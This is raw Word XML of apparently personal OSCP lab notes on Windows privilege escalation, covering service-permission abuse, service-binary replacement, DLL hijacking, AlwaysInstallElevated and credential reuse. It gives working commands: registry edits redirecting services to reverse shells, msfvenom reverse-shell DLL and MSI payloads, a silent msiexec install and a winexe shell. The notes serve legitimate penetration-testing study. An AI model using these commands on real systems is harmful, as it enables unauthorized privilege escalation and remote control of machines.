      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uvwqk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SERVICEPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F683040" w14:textId="7FDDC342" w:rsidR="007255C9" w:rsidRDefault="007255C9" w:rsidP="0028111A">
      <w:r>
        <w:t>Looking to see a group which we are part of (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> INTERACTIVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998C7EA" w14:textId="0C970627" w:rsidR="007255C9" w:rsidRDefault="007255C9" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Also </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12760A" w14:textId="77777777" w:rsidR="007255C9" w:rsidRDefault="007255C9" w:rsidP="007255C9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USER SERVICENAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51470C50" w14:textId="77777777" w:rsidR="007255C9" w:rsidRDefault="007255C9" w:rsidP="007255C9">
      <w:r>
        <w:t xml:space="preserve">Must be able to start the service (and stop if running – check with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query SERVICENAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E902D" w14:textId="5CD72934" w:rsidR="004E6F2F" w:rsidRDefault="00ED2914" w:rsidP="0028111A">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554A348" w14:textId="32CC251F" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F26F63" w14:textId="5497C115" w:rsidR="00ED2914" w:rsidRDefault="00ED2914" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Sc stop SERVICENAME</w:t>
      </w:r>
      <w:r w:rsidR="00CB34A1">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CB34A1">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CB34A1">
        <w:t>if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC1C8F" w14:textId="78E8D307" w:rsidR="00ED2914" w:rsidRDefault="00ED2914" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Reg add SERVICEPATH /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ImagePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /t REG_EXPAND_SZ /d FULLPATH\reverse.exe /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4B878" w14:textId="1E4F45BB" w:rsidR="00ED2914" w:rsidRDefault="00ED2914" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Sc start SERVICENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3D168" w14:textId="38DF3130" w:rsidR="00AF291B" w:rsidRPr="006D7F1B" w:rsidRDefault="00ED2914">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Service Executables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656ED3A1" w14:textId="25191216" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22D3D771" w14:textId="27D5C4E5" w:rsidR="00ED2914" w:rsidRDefault="00ED2914">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B3A14FE" wp14:editId="5C14DFAD">
            <wp:extent cx="4211782" cy="13345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57728" cy="1349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599A6" w14:textId="77777777" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1" w:rsidP="00CB34A1">
      <w:r>
        <w:t xml:space="preserve">Confirm with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="078446FB" w14:textId="77777777" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1" w:rsidP="00CB34A1">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USER SERVICENAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3BE35" w14:textId="77777777" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1" w:rsidP="00CB34A1">
      <w:r>
        <w:t xml:space="preserve">Must be able to start the service (and stop if running – check with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query SERVICENAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF3EE3" w14:textId="152903D6" w:rsidR="00ED2914" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184F491" w14:textId="657774A2" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C24ECF" w14:textId="71E00AE1" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sc stop    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DB29F" w14:textId="3B0E45A3" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:tab/>
        <w:t>Copy /Y FULLPATH\reverse.exe SERVICEPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D924745" w14:textId="43579DC8" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:tab/>
        <w:t>Sc start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CD43B" w14:textId="7EE8F0A6" w:rsidR="00CB34A1" w:rsidRPr="006D7F1B" w:rsidRDefault="00CB34A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL hijacking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964FFB9" w14:textId="44BFA4CC" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0721F10B" w14:textId="2588272D" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A6786D" wp14:editId="5A6218AD">
            <wp:extent cx="5731510" cy="99250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3BC97" w14:textId="226EE80D" w:rsidR="00D87076" w:rsidRDefault="00D87076">
      <w:r>
        <w:t xml:space="preserve">Can be done with any of the services listed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can start/stop, so check each with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="204416BC" w14:textId="77777777" w:rsidR="00D87076" w:rsidRDefault="00D87076" w:rsidP="00D87076">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USER SERVICENAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28E3C4" w14:textId="68455534" w:rsidR="00D87076" w:rsidRDefault="00D87076" w:rsidP="00D87076">
      <w:r>
        <w:t xml:space="preserve">Must be able to start the service (and stop if running – check with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query SERVICENAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E298FD" w14:textId="7E13FE5E" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076"/>
    <w:p w14:paraId="601261E5" w14:textId="181BE9A3" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Copy service .exe file onto kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEE158" w14:textId="098F8D11" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t xml:space="preserve">Connect to windows 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client after reverting on website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323738E" w14:textId="237BCAF3" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00900340">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00900340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00900340">
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00900340">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900340">
        <w:t>u:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900340">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00900340">
        <w:t>p:lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00900340">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00900340">
        <w:t>cert:ignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00900340">
        <w:t xml:space="preserve"> /v:192.168.163.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2585F8" w14:textId="2D426D8C" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Copy Procmon64.exe and the service .exe file onto this client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68716A1A" w14:textId="1E89DA38" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Run Procmon64.exe as admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29855F07" w14:textId="6E551688" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Stop and clear the current capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E5172" w14:textId="0FBDD497" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Ctrl L, then process name in the left filter and service executable filename in box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00914B99" w14:textId="3B685DAA" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Click add, then ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE0632" w14:textId="7FB7AFE3" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Deselect show registry activity and show network activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3A35B" w14:textId="4595DC0B" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Start capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212767A4" w14:textId="00F5490E" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>On command prompt, start the service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF0FD51" w14:textId="078FFCDB" w:rsidR="00900340" w:rsidRDefault="00900340" w:rsidP="00D87076">
      <w:r>
        <w:t>Next to name not found with the correct directory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, C:\Temp), see .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filename to use later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8FAA4" w14:textId="12AFAFCC" w:rsidR="00D87076" w:rsidRDefault="006C78E6">
      <w:r>
        <w:t>Create a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="00900340">
        <w:t>with this name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A7D6C" w14:textId="4532904B" w:rsidR="006C78E6" w:rsidRDefault="006C78E6">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=IP LPORT=PORT -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00900340">
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C68E36" w14:textId="1C29F3C1" w:rsidR="006C78E6" w:rsidRDefault="006C78E6">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD55F9" w14:textId="6FAB587A" w:rsidR="006C78E6" w:rsidRDefault="006C78E6" w:rsidP="00900340">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E4073" w14:textId="516FB1F2" w:rsidR="00900340" w:rsidRDefault="006C78E6" w:rsidP="00900340">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Copy FULLPATH\reverse.dll C:\Temp  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">not necessarily C:\Temp, look at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00900340" w:rsidRPr="00900340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000990BB" w14:textId="450A6EE0" w:rsidR="006C78E6" w:rsidRDefault="00900340">
      <w:r>
        <w:tab/>
        <w:t>Sc stop SERVICENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A0EAF" w14:textId="3C4C58AC" w:rsidR="006C78E6" w:rsidRDefault="006C78E6">
      <w:r>
        <w:tab/>
        <w:t>Sc start SERVICENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F29B65" w14:textId="5D7F3DB4" w:rsidR="00900340" w:rsidRPr="006D7F1B" w:rsidRDefault="00900340">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF127F3" w14:textId="36FADA96" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autorun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A075FF" w14:textId="78773F28" w:rsidR="00816F6D" w:rsidRPr="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:t>Need admin to login for this so unlikely</w:t>
      </w:r>
      <w:r w:rsidR="009E15DA">
        <w:t xml:space="preserve"> but check </w:t>
      </w:r>
      <w:r w:rsidR="009E15DA" w:rsidRPr="009E15DA">
        <w:t>https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#windows-1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E699431" w14:textId="36D7B2BF" w:rsidR="00AF291B" w:rsidRPr="00816F6D" w:rsidRDefault="008C18FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00816F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00816F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows Credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDA1F9" w14:textId="15EA9EFB" w:rsidR="006D7F1B" w:rsidRDefault="00816F6D">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17B42E3A" w14:textId="2C79BAEA" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2139B35B" wp14:editId="31C6A376">
            <wp:extent cx="5731510" cy="53213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45CB4" w14:textId="619CA3A2" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:t>Need both to be set to 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48057E66" w14:textId="1826B3C2" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:t>Use .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell this time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506B3E4" w14:textId="3D889504" w:rsidR="00816F6D" w:rsidRDefault="00816F6D" w:rsidP="00816F6D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E0DCDC"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; reverse.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAD353" w14:textId="5158677F" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787421C" w14:textId="2584CE62" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE5E9D" w14:textId="3277BE99" w:rsidR="00816F6D" w:rsidRDefault="00816F6D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msiexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /quiet /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04429FC5" w14:textId="55B15297" w:rsidR="00890836" w:rsidRPr="00816F6D" w:rsidRDefault="00816F6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00816F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C620612" w14:textId="7D3252D6" w:rsidR="00816F6D" w:rsidRDefault="005C60A3">
      <w:r>
        <w:t xml:space="preserve">Lookout for passwords in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> check manually to see if passwords accompany found usernames (for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autologon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, for example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0D7C0" w14:textId="29796885" w:rsidR="005C60A3" w:rsidRDefault="005C60A3">
      <w:r>
        <w:t>Spawn a shell with new credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE9A65" w14:textId="4E310379" w:rsidR="005C60A3" w:rsidRDefault="005C60A3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user@password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ //RHOST cmd.exe </w:t>
      </w:r>
